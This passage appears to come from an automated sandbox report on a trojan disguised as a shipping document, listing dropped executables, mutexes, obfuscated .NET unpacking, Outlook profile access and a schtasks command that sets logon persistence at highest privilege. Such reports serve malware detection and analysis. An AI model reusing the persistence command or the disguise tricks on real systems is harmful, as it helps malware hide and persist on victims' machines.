gzZVbrGoWZo9LkVQhxcTV+dRn7ngwh2eyPJnvVnLGzKHzRtCo3JIJGjoxdCapAlZDQ6FpQ5U040WFm65ezDdoEnjRGpwLAzqXXQCMeS5dkec+L/qFIxBYFKY4oUtbkJA+puMKIwAfokBPCUvtabAR06h/eOG+KN8JSZZaw4qCxpg8Lm19GyNO/0QzG9gZhKzQDHy1LRgUGUgfZsnma67eRd1kGEltAVLfh8sxhCZGsVOG+J8zJUupy7nDtkscPOS9Owk99SnpLCbnuSaZsILOT7zew5IUfHLqxCF68h5RBe6KIz1sfspxdoPhy1ApGxa/dXeciqYdf6fblZ0OqKuy5SDLzrFZm6TNxJz4Rjdy2ogngJkrvLxyJqjmFhUzjwRbnkBgUtbWc5mTUk6orwMZocI1PSyI6cV6dkk5vWaC0Or7S0YnIh4Lljvk3n6wZWUUNCuTMVok7tEX3QVz0P9cq/B+JqHvK6IMW+8625tiE9BBiD+aOsbR5arCl3lWaIh4dbfGF8l5CwELZR8xtZINQDO9dUjVtA24z7xaSnuc+EUMmWzeD50WjkIg3fD8Sy0cg1ZOne7ii8fT5dEYN4vcoNU36oqK2WeM7jGqUd8iH0dJupYQmrlyqxKrUJJ9zEW/xykCRpZpFFnbnsgKeOQmQ67thY+2qYgNCCSxHMoKcCc2g6e0tgqbricINUKh/kxKZKhxrnW12YsxxURnnmy0pwr/KoR9tP9it1k+7dlkiCkDKfo4nhF33cE3zfptb0J4TpUWqTYo1Fy9hC6u+KP7K9tquClJ8Md6syTJnXYx46GlMjK57mQdC40Pnc0UbJZwklgJbnxBjEWF3CTP3im/8HsacBVK0hnk6xOkm8AwCCjyuHANKI4Ne+8oOn9bU9MZXwyb2jN6ALAJlqWyBNHdBRh+RYLCXHODCVaKvwiWQT17v1KTnKakmdG8lL8Z/HKJ/LM5aG5RjRC+G4yEtqakKiHBaAZp6vQPBwJN+0jocQfAbYZeJeAMnn2WiM32Py/4mJbU9fiohhWvfkIO4FKz6r/o+scNgzXJ4RAIl8abuIO/K9si9udpahwpBw0imxDQ5G+nouhfKfUJjY1V+GlQ1yuamNoEAtx/eZg+zxz/DOnV3RSj9pw=', 'xxylxPRRUDGoeLCh79doFks73rkjhjUNySQ5ZO74MLBY+NvsEmayZOD5ufvPUkN3nPaSP4Qj9mF917TtveQLcw==', 'h4JAH4YAbXw1lKuOZo7dDI2BxqPULh0MyemNhxHcqcLPzQu3RAeFFjFHQVzOOMSd050FmtunFZv4cfV9I1RsZA=='

Source: 3.0.Icda.exe.a40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 3.0.Icda.exe.a40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: dhcpmon.exe.3.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: dhcpmon.exe.3.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Icda.exe.1.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: Icda.exe.1.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Isgeprf.exe.2.dr, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: Isgeprf.exe.2.dr, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@26/14@13/2

Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Code function: 3_2_052910DA AdjustTokenPrivileges,		3_2_052910DA
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Code function: 3_2_052910A3 AdjustTokenPrivileges,		3_2_052910A3

Source: C:\Users\user\AppData\Local\Temp\Icda.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Consignment Document PL&BL Draft.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{a60f1e04-b281-49b0-9733-22b28c2ea6d7}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6276:120:WilError_01

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe

File created: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe

Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpA04.tmp.bat''

Source: Consignment Document PL&BL Draft.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Consignment Document PL&BL Draft.exe

Virustotal: Detection: 21%

Source: unknown	Process created: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe 'C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe {path}
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe 'C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Icda.exe 'C:\Users\user\AppData\Local\Temp\Icda.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Isgeprf.exe 'C:\Users\user\AppData\Local\Temp\Isgeprf.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe 'C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe'' & exit
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpA04.tmp.bat''
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe''
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\VLC2.exe C:\Users\user\AppData\Local\Temp\VLC2.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\VLC2.exe 'C:\Users\user\AppData\Local\Temp\VLC2.exe'
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Process created: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Process created: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe 'C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Process created: C:\Users\user\AppData\Local\Temp\Icda.exe 'C:\Users\user\AppData\Local\Temp\Icda.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe	Process created: C:\Users\user\AppData\Local\Temp\Isgeprf.exe 'C:\Users\user\AppData\Local\Temp\Isgeprf.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe	Process created: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe 'C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe'' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpA04.tmp.bat''	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe''
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\VLC2.exe 'C:\Users\user\AppData\Local\Temp\VLC2.exe'

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Consignment Document PL&BL Draft.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: C:\Users\user\AppData\Local\Temp\Icda.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: Consignment Document PL&BL Draft.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: indows\mscorlib.pdbpdblib.pdb source: Icda.exe, 00000003.00000002.488044286.0000000002DD5000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: Icda.exe, 00000003.00000002.493930043.0000000005670000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe

Unpacked PE file: 2.2.Rczgwoxvqzh.exe.c00000.0.unpack

.NET source code contains potential unpacker

Show sources

Source: Consignment Document PL&BL Draft.exe, telaPrincipal.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Consignment Document PL&BL Draft.exe.ba0000.0.unpack, telaPrincipal.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Icda.exe.1.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Icda.exe.1.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.Consignment Document PL&BL Draft.exe.c70000.1.unpack, telaPrincipal.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.Consignment Document PL&BL Draft.exe.c70000.0.unpack, telaPrincipal.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dhcpmon.exe.3.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dhcpmon.exe.3.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Icda.exe.a40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Icda.exe.a40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Code function: 0_2_00BA5286 push es; retf	0_2_00BA5288
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Code function: 1_2_00C75286 push es; retf	1_2_00C75288
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Code function: 1_2_016786A2 pushfd ; iretd	1_2_016786C5
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Code function: 1_2_0167FA42 pushfd ; iretd	1_2_0167FA49
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Code function: 1_2_05786BF7 push E801005Eh; retf	1_2_05786C01
Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Code function: 4_2_00714122 push eax; ret	4_2_0071412C
Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Code function: 4_2_00712A66 push 0000003Eh; retn 0000h	4_2_00712DC0
Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Code function: 4_2_00712F81 push eax; ret	4_2_00712F95

Source: initial sample	Static PE information: section name: .text entropy: 7.86672838882
Source: initial sample	Static PE information: section name: .text entropy: 7.98388170142

Source: Icda.exe.1.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: Icda.exe.1.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: dhcpmon.exe.3.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: dhcpmon.exe.3.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 3.0.Icda.exe.a40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
